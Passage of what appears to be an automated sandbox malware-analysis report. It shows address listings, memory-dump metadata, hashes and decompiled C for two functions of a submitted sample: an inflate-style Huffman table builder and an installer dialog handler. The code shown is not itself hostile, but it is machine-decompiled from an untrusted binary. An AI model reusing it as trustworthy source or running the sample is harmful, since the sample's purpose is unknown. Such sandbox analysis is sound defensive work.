                                                0x00406ef9
                                                0x00406efd
                                                0x00406f00
                                                0x00406f03
                                                0x00406f1b
                                                0x00406f1b
                                                0x00406f1e
                                                0x00406f2c
                                                0x00406f2f
                                                0x00406f20
                                                0x00406f20
                                                0x00406f22
                                                0x00406f29
                                                0x00406f29
                                                0x00406f58
                                                0x00406f58
                                                0x00406f58
                                                0x00406f5b
                                                0x00406f5d
                                                0x00000000
                                                0x00000000
                                                0x00406f38
                                                0x00406f38
                                                0x00406f3c
                                                0x00000000
                                                0x00000000
                                                0x00406f42
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4d
                                                0x00406f4f
                                                0x00406f52
                                                0x00406f55
                                                0x00406f55
                                                0x00406f55
                                                0x00406f5f
                                                0x00406f5f
                                                0x00406f61
                                                0x00406f63
                                                0x00406f6e
                                                0x00406f71
                                                0x00406f74
                                                0x00406f76
                                                0x00406f78
                                                0x00406f7a
                                                0x00406f7d
                                                0x00406f80
                                                0x00406f85
                                                0x00406f88
                                                0x00406f8b
                                                0x00406f8e
                                                0x00406f95
                                                0x00406f98
                                                0x00406f9a
                                                0x00000000
                                                0x00000000
                                                0x00406fa0
                                                0x00406fa0
                                                0x00406fa4
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb7
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbd
                                                0x00406fbe
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc4
                                                0x00000000
                                                0x00406fc4
                                                0x00406fa6
                                                0x00406fa6
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x00406faf
                                                0x00406faf
                                                0x00000000
                                                0x00406faf
                                                0x00406f05
                                                0x00406f05
                                                0x00406f07
                                                0x00406f09
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f13
                                                0x00406f13
                                                0x00406fe7
                                                0x00406fe7
                                                0x00406fea
                                                0x00406ff1
                                                0x00406ff5
                                                0x00406ff7
                                                0x00406ffa
                                                0x00406ffd
                                                0x00407002
                                                0x00407005
                                                0x00407007
                                                0x00407008
                                                0x0040700b
                                                0x00407016
                                                0x00407019
                                                0x00407030
                                                0x00407035
                                                0x0040703c
                                                0x00407041
                                                0x00407045
                                                0x00407047
                                                0x00407047
                                                0x00407047
                                                0x0040704a
                                                0x0040704c
                                                0x00000000
                                                0x00407052
                                                0x00407052
                                                0x00407056
                                                0x00407061
                                                0x00407074
                                                0x00407079
                                                0x0040707e
                                                0x00407080
                                                0x00000000
                                                0x00000000
                                                0x00407086
                                                0x00407086
                                                0x00407089
                                                0x0040708b
                                                0x00407099
                                                0x00407099
                                                0x0040709c
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x00000000
                                                0x004070ae
                                                0x0040708d
                                                0x0040708d
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407432
                                                0x00407432
                                                0x00407438
                                                0x0040743e
                                                0x00407443
                                                0x00407449
                                                0x0040744f
                                                0x00407451
                                                0x00407454
                                                0x0040745d
                                                0x00407463
                                                0x00407463
                                                0x00407456
                                                0x00407458
                                                0x0040745a
                                                0x0040745a
                                                0x00407465
                                                0x00407467
                                                0x0040746a
                                                0x004074a5
                                                0x004074a5
                                                0x00000000
                                                0x0040746c
                                                0x0040746c
                                                0x0040746c
                                                0x00407472
                                                0x00407475
                                                0x00407477
                                                0x004074ac
                                                0x004074ae
                                                0x00000000
                                                0x004074ae
                                                0x00000000
                                                0x00407477
                                                0x00000000
                                                0x00406ab6
                                                0x00407484
                                                0x00000000
                                                0x00407484
                                                0x00406e98
                                                0x00406e9a
                                                0x00000000
                                                0x00000000
                                                0x00406e9c
                                                0x00406e9c
                                                0x00406e9f
                                                0x00000000
                                                0x00406e9f
                                                0x00406de4
                                                0x00406da5
                                                0x00407489
                                                0x0040748c
                                                0x0040748e
                                                0x00407497
                                                0x0040749d
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                				signed int _v8;
                                                				unsigned int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr* _v32;
                                                				signed int* _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				void _v116;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _v240;
                                                				signed int _t166;
                                                				signed int _t168;
                                                				intOrPtr _t175;
                                                				signed int _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int* _t184;
                                                				signed int _t186;
                                                				signed int _t187;
                                                				signed int* _t189;
                                                				signed int _t190;
                                                				intOrPtr* _t191;
                                                				intOrPtr _t192;
                                                				signed int _t193;
                                                				signed int _t195;
                                                				signed int _t200;
                                                				signed int _t205;
                                                				void* _t207;
                                                				short _t208;
                                                				signed char _t222;
                                                				signed int _t224;
                                                				signed int _t225;
                                                				signed int* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t235;
                                                				signed int _t236;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t251;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t259;
                                                				signed int _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                				signed int _t267;
                                                				intOrPtr _t269;
                                                				intOrPtr _t271;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				unsigned int _t276;
                                                				void* _t277;
                                                				signed int _t278;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				intOrPtr _t282;
                                                				intOrPtr _t283;
                                                				signed int* _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t296;
                                                				signed int* _t297;
                                                				intOrPtr _t298;
                                                				void* _t299;
                                                
                                                				_t278 = _a8;
                                                				_t187 = 0x10;
                                                				memset( &_v116, 0, _t187 << 2);
                                                				_t189 = _a4;
                                                				_t233 = _t278;
                                                				do {
                                                					_t166 =  *_t189;
                                                					_t189 =  &(_t189[1]);
                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                					_t233 = _t233 - 1;
                                                				} while (_t233 != 0);
                                                				if(_v116 != _t278) {
                                                					_t279 = _a28;
                                                					_t267 =  *_t279;
                                                					_t190 = 1;
                                                					_a28 = _t267;
                                                					_t234 = 0xf;
                                                					while(1) {
                                                						_t168 = 0;
                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                							break;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						if(_t190 <= _t234) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v8 = _t190;
                                                					if(_t267 < _t190) {
                                                						_a28 = _t190;
                                                					}
                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                						_t234 = _t234 - 1;
                                                						if(_t234 != 0) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v28 = _t234;
                                                					if(_a28 > _t234) {
                                                						_a28 = _t234;
                                                					}
                                                					 *_t279 = _a28;
                                                					_t181 = 1 << _t190;
                                                					while(_t190 < _t234) {
                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                						if(_t182 < 0) {
                                                							L64:
                                                							return _t168 | 0xffffffff;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						_t181 = _t182 + _t182;
                                                					}
                                                					_t281 = _t234 << 2;
                                                					_t191 = _t299 + _t281 - 0x70;
                                                					_t269 =  *_t191;
                                                					_t183 = _t181 - _t269;
                                                					_v52 = _t183;
                                                					if(_t183 < 0) {
                                                						goto L64;
                                                					}
                                                					_v176 = _t168;
                                                					 *_t191 = _t269 + _t183;
                                                					_t192 = 0;
                                                					_t235 = _t234 - 1;
                                                					if(_t235 == 0) {
                                                						L21:
                                                						_t184 = _a4;
                                                						_t271 = 0;
                                                						do {
                                                							_t193 =  *_t184;
                                                							_t184 =  &(_t184[1]);
                                                							if(_t193 != _t168) {
                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                								_t236 =  *_t232;
                                                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                								 *_t232 = _t236 + 1;
                                                							}
                                                							_t271 = _t271 + 1;
                                                						} while (_t271 < _a8);
                                                						_v16 = _v16 | 0xffffffff;
                                                						_v40 = _v40 & 0x00000000;
                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                						_t195 = _v8;
                                                						_t186 =  ~_a28;
                                                						_v12 = _t168;
                                                						_v180 = _t168;
                                                						_v36 = 0x432190;
                                                						_v240 = _t168;
                                                						if(_t195 > _v28) {
                                                							L62:
                                                							_t168 = 0;
                                                							if(_v52 == 0 || _v28 == 1) {
                                                								return _t168;
                                                							} else {
                                                								goto L64;
                                                							}
                                                						}
                                                						_v44 = _t195 - 1;
                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                						do {
                                                							_t282 =  *_v32;
                                                							if(_t282 == 0) {
                                                								goto L61;
                                                							}
                                                							while(1) {
                                                								_t283 = _t282 - 1;
                                                								_t200 = _a28 + _t186;
                                                								_v48 = _t283;
                                                								_v24 = _t200;
                                                								if(_v8 <= _t200) {
                                                									goto L45;
                                                								}
                                                								L31:
                                                								_v20 = _t283 + 1;
                                                								do {
                                                									_v16 = _v16 + 1;
                                                									_t296 = _v28 - _v24;
                                                									if(_t296 > _a28) {
                                                										_t296 = _a28;
                                                									}
                                                									_t222 = _v8 - _v24;
                                                									_t254 = 1 << _t222;
                                                									if(1 <= _v20) {
                                                										L40:
                                                										_t256 =  *_a36;
                                                										_t168 = 1 << _t222;
                                                										_v40 = 1;
                                                										_t274 = _t256 + 1;
                                                										if(_t274 > 0x5a0) {
                                                											goto L64;
                                                										}
                                                									} else {
                                                										_t275 = _v32;
                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                										if(_t222 >= _t296) {
                                                											goto L40;
                                                										}
                                                										while(1) {
                                                											_t222 = _t222 + 1;
                                                											if(_t222 >= _t296) {
                                                												goto L40;
                                                											}
                                                											_t275 = _t275 + 4;
                                                											_t264 = _t263 + _t263;
                                                											_t175 =  *_t275;
                                                											if(_t264 <= _t175) {
                                                												goto L40;
                                                											}
                                                											_t263 = _t264 - _t175;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t168 = _a32 + _t256 * 4;
                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                									 *_a36 = _t274;
                                                									_t259 = _v16;
                                                									 *_t297 = _t168;
                                                									if(_t259 == 0) {
                                                										 *_a24 = _t168;
                                                									} else {
                                                										_t276 = _v12;
                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                										_a5 = _a28;
                                                										_a4 = _t222;
                                                										_t262 = _t276 >> _t186;
                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                										 *(_t298 + _t262 * 4) = _a4;
                                                									}
                                                									_t224 = _v24;
                                                									_t186 = _t224;
                                                									_t225 = _t224 + _a28;
                                                									_v24 = _t225;
                                                								} while (_v8 > _t225);
                                                								L45:
                                                								_t284 = _v36;
                                                								_a5 = _v8 - _t186;
                                                								if(_t284 < 0x432190 + _a8 * 4) {
                                                									_t205 =  *_t284;
                                                									if(_t205 >= _a12) {
                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                										_v36 =  &(_v36[1]);
                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                									} else {
                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                										_t208 =  *_t284;
                                                										_v36 =  &(_t284[1]);
                                                									}
                                                									_a6 = _t208;
                                                								} else {
                                                									_a4 = 0xc0;
                                                								}
                                                								_t286 = 1 << _v8 - _t186;
                                                								_t244 = _v12 >> _t186;
                                                								while(_t244 < _v40) {
                                                									 *(_t168 + _t244 * 4) = _a4;
                                                									_t244 = _t244 + _t286;
                                                								}
                                                								_t287 = _v12;
                                                								_t246 = 1 << _v44;
                                                								while((_t287 & _t246) != 0) {
                                                									_t287 = _t287 ^ _t246;
                                                									_t246 = _t246 >> 1;
                                                								}
                                                								_t288 = _t287 ^ _t246;
                                                								_v20 = 1;
                                                								_v12 = _t288;
                                                								_t251 = _v16;
                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                									L60:
                                                									if(_v48 != 0) {
                                                										_t282 = _v48;
                                                										_t283 = _t282 - 1;
                                                										_t200 = _a28 + _t186;
                                                										_v48 = _t283;
                                                										_v24 = _t200;
                                                										if(_v8 <= _t200) {
                                                											goto L45;
                                                										}
                                                										goto L31;
                                                									}
                                                									break;
                                                								} else {
                                                									goto L58;
                                                								}
                                                								do {
                                                									L58:
                                                									_t186 = _t186 - _a28;
                                                									_t251 = _t251 - 1;
                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                								_v16 = _t251;
                                                								goto L60;
                                                							}
                                                							L61:
                                                							_v8 = _v8 + 1;
                                                							_v32 = _v32 + 4;
                                                							_v44 = _v44 + 1;
                                                						} while (_v8 <= _v28);
                                                						goto L62;
                                                					}
                                                					_t277 = 0;
                                                					do {
                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                						_t277 = _t277 + 4;
                                                						_t235 = _t235 - 1;
                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                					} while (_t235 != 0);
                                                					goto L21;
                                                				}
                                                				 *_a24 =  *_a24 & 0x00000000;
                                                				 *_a28 =  *_a28 & 0x00000000;
                                                				return 0;
                                                			}











































































                                                0x00407567
                                                0x0040756f
                                                0x00407573
                                                0x00407575
                                                0x00407578
                                                0x0040757a
                                                0x0040757a
                                                0x0040757c
                                                0x00407583
                                                0x00407585
                                                0x00407585
                                                0x0040758b
                                                0x004075a0
                                                0x004075a8
                                                0x004075aa
                                                0x004075ac
                                                0x004075af
                                                0x004075b0
                                                0x004075b0
                                                0x004075b6
                                                0x00000000
                                                0x00000000
                                                0x004075b8
                                                0x004075bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075bb
                                                0x004075bf
                                                0x004075c2
                                                0x004075c4
                                                0x004075c4
                                                0x004075c7
                                                0x004075cd
                                                0x004075ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075ce
                                                0x004075d3
                                                0x004075d6
                                                0x004075d8
                                                0x004075d8
                                                0x004075de
                                                0x004075e0
                                                0x004075f1
                                                0x004075e4
                                                0x004075e8
                                                0x0040788d
                                                0x00000000
                                                0x0040788d
                                                0x004075ee
                                                0x004075ef
                                                0x004075ef
                                                0x004075f7
                                                0x004075fa
                                                0x004075fe
                                                0x00407600
                                                0x00407602
                                                0x00407605
                                                0x00000000
                                                0x00000000
                                                0x0040760d
                                                0x00407613
                                                0x00407615
                                                0x00407617
                                                0x00407618
                                                0x0040762d
                                                0x0040762d
                                                0x00407630
                                                0x00407632
                                                0x00407632
                                                0x00407634
                                                0x00407639
                                                0x0040763b
                                                0x00407642
                                                0x00407644
                                                0x0040764c
                                                0x0040764c
                                                0x0040764e
                                                0x0040764f
                                                0x0040765e
                                                0x00407662
                                                0x00407666
                                                0x00407669
                                                0x0040766c
                                                0x00407671
                                                0x00407674
                                                0x0040767a
                                                0x00407681
                                                0x00407687
                                                0x00407880
                                                0x00407880
                                                0x00407885
                                                0x00407894
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407885
                                                0x00407694
                                                0x00407697
                                                0x0040769a
                                                0x0040769d
                                                0x004076a1
                                                0x00000000
                                                0x00000000
                                                0x004076ac
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x004076c1
                                                0x004076c2
                                                0x004076c5
                                                0x004076c8
                                                0x004076cb
                                                0x004076d1
                                                0x004076d3
                                                0x004076d3
                                                0x004076db
                                                0x004076df
                                                0x004076e4
                                                0x00407709
                                                0x0040770f
                                                0x00407711
                                                0x00407713
                                                0x00407716
                                                0x0040771f
                                                0x00000000
                                                0x00000000
                                                0x004076e6
                                                0x004076e6
                                                0x004076ef
                                                0x004076f3
                                                0x00000000
                                                0x00000000
                                                0x00407704
                                                0x00407704
                                                0x00407707
                                                0x00000000
                                                0x00000000
                                                0x004076f7
                                                0x004076fa
                                                0x004076fc
                                                0x00407700
                                                0x00000000
                                                0x00000000
                                                0x00407702
                                                0x00407702
                                                0x00000000
                                                0x00407704
                                                0x00407728
                                                0x0040772e
                                                0x00407738
                                                0x0040773a
                                                0x0040773f
                                                0x00407741
                                                0x00407777
                                                0x00407743
                                                0x00407743
                                                0x00407746
                                                0x00407749
                                                0x00407753
                                                0x00407756
                                                0x0040775d
                                                0x00407768
                                                0x0040776f
                                                0x0040776f
                                                0x00407779
                                                0x0040777c
                                                0x0040777e
                                                0x00407784
                                                0x00407784
                                                0x0040778d
                                                0x00407790
                                                0x00407795
                                                0x004077a4
                                                0x004077ac
                                                0x004077b1
                                                0x004077d5
                                                0x004077dd
                                                0x004077e1
                                                0x004077e7
                                                0x004077b3
                                                0x004077c1
                                                0x004077c4
                                                0x004077ca
                                                0x004077ca
                                                0x004077eb
                                                0x004077a6
                                                0x004077a6
                                                0x004077a6
                                                0x004077fc
                                                0x00407800
                                                0x0040780c
                                                0x00407807
                                                0x0040780a
                                                0x0040780a
                                                0x00407814
                                                0x00407819
                                                0x00407821
                                                0x0040781d
                                                0x0040781f
                                                0x0040781f
                                                0x00407827
                                                0x00407829
                                                0x00407830
                                                0x0040783a
                                                0x00407844
                                                0x00407860
                                                0x00407864
                                                0x004076a9
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407846
                                                0x00407846
                                                0x00407846
                                                0x0040784b
                                                0x00407854
                                                0x0040785d
                                                0x00000000
                                                0x0040785d
                                                0x0040786a
                                                0x0040786a
                                                0x0040786d
                                                0x00407874
                                                0x00407877
                                                0x00000000
                                                0x0040769a
                                                0x0040761a
                                                0x0040761c
                                                0x0040761c
                                                0x00407620
                                                0x00407623
                                                0x00407624
                                                0x00407624
                                                0x00000000
                                                0x0040761c
                                                0x00407590
                                                0x00407596
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x434f28;
                                                				_v28 =  *0x434f10 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x434f19 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x42d24c;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x42d260;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x42d24c = 0;
                                                								 *0x42d260 = 0;
                                                								 *0x434f60 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404ED4();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x42d260;
                                                									_t201 =  *0x434f28;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x434f2c <= 0) {
                                                										L86:
                                                										if( *0x434fbe == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
